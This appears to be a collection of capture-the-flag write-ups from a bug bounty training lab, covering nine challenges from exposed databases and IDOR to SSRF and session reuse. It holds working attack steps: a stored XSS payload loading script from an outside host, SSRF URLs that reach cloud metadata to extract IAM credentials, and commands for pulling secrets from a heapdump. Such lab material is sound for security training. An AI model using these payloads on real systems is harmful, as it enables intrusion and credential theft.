Open Deepseek Database
Vulnerability Type: Exposed Database / Unauthenticated Access Impact: Full log stream exposure
Methodology
- Identified exposed service:
http://deepleak.bugbountymasterclass.com:8123/- Enumerated databases:
SHOW DATABASES;- Extracted sensitive data:
SELECT string_values
FROM deepleak.log_stream
WHERE string_values LIKE '%WIZFLAG%';
Root Cause
Database exposed without authentication.
Major Airline Data Dump
Vulnerability Type: Broken Access Control / IDOR Impact: Mass passenger data exposure
Methodology
- Subdomain discovery via:
https://crt.sh/- Found:
api.airlines.bugbountymasterclass.com- Explored Swagger docs:
https://api.airlines.bugbountymasterclass.com/docs/- Identifying the Vulnerable Endpoint
/api/getMemberships
/api/searchMemberInfo- Executing the Data Dump
/api/getMemberships
Root Cause
Missing authorization checks on API endpoints.
Domain Registrar Data Exposure
Vulnerability Type: Open Directory / Backup Leak Impact: Sensitive internal database exposed
Methodology
- Found accessible directory:
https://shark.bugbountymasterclass.com/uploads/- Downloaded:
shark-db.zip- Searched contents for:
"WIZFLAG"
Root Cause
Backup files stored in public web directory.
Logistics Company Admin Panel Compromise
Vulnerability Type: Blind Stored XSS Impact: Admin session compromise
Methodology
- Injection : Issue Tracker from Description box
- Payload:
'"><script src=https://xss.report/c/wq></script>- Triggered when admin viewed issue.
https://logistics.bugbountymasterclass.com/admin- view issue
Root Cause
User input rendered without sanitization.
Root Domain Takeover — Fintech
Vulnerability Type: (S3) Impact: Full domain control
Observation
- XML error revealed:
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist</Message>
<BucketName>www.fintech.net</BucketName>
<RequestId>F30JFVWZJ5DJJ53T</RequestId>
<HostId>bc6zPv6yA3Vf2atd+xD0gSWKoQQcwlS0aGChBWpNfnbHDghuVU8B4ElZRAzYP2l3GUyPaGbnlylri1Sg1DdWZaLw49/hQlVKgbovz93hg1k=</HostId>
</Error>
Root Cause
Dangling DNS record pointing to unclaimed S3 bucket.
SSRF — Major Gaming Company
Vulnerability Type: Server-Side Request Forgery Impact: Cloud credential exposure
Methodology
- Domain visit
https://content-service.bugbountymasterclass.com- Exploit Path
{fileName}- Request this URL
https://content-service.bugbountymasterclass.com/api/content/v2/module/c5b1ee02-4096-4f92-e437-7f932c6b1181/version/2/staged-files/http://169.254.169.254/latest/meta-data/- List the IAM Roles
https://content-service.bugbountymasterclass.com/api/content/v2/module/c5b1ee02-4096-4f92-e437-7f932c6b1181/version/2/staged-files/http://169.254.169.254/latest/meta-data/iam/security-credentials/- Extract the Credentials and Flag
https://content-service.bugbountymasterclass.com/api/content/v2/module/c5b1ee02-4096-4f92-e437-7f932c6b1181/version/2/staged-files/http://169.254.169.254/latest/meta-data/iam/security-credentials/content-service-role
Root Cause
Backend fetch function lacked URL validation
GitHub Authentication Bypass — Major CRM
Vulnerability Type: Secret Leak (Exposed PAT) Impact: Internal GitHub access
Methodology
- GitHub dork:
"bugbountymasterclass.com"- Click nagliwiz/cool-stuff · .env
- Commits chek GITHUB_TOKEN and copy
- go and Validate GitHub Token
https://github.enterprise.bugbountymasterclass.com/
Root Cause
Developer committed credentials to public repo.
Breaking into a Major Bank
Vulnerability Type: Exposed Spring Boot Actuator Impact: Memory dump → secret extraction
Discovery
/actuator/env- Locate the Vulnerable Dump Endpoint
https://bank.bugbountymasterclass.com/actuator/heapdump- Extracted flag via:
strings heapdump | grep "WIZFLAG"
Root Cause
Production environment exposed debugging endpoints.
0-Click Account Takeover (Router Reseller)
Vulnerability Type: Cross-Environment Session Confusion Impact: Full admin takeover
Exploit Steps
- Logged into staging as gues
https://stage.router-resellers.bugbountymasterclass.com/login- Captured session cookie
- Replayed cookie in production
https://prod.router-resellers.bugbountymasterclass.com/- Gained ADMIN access
Root Cause
- Same session signing secret across environments
- Cookie scoped to parent domain
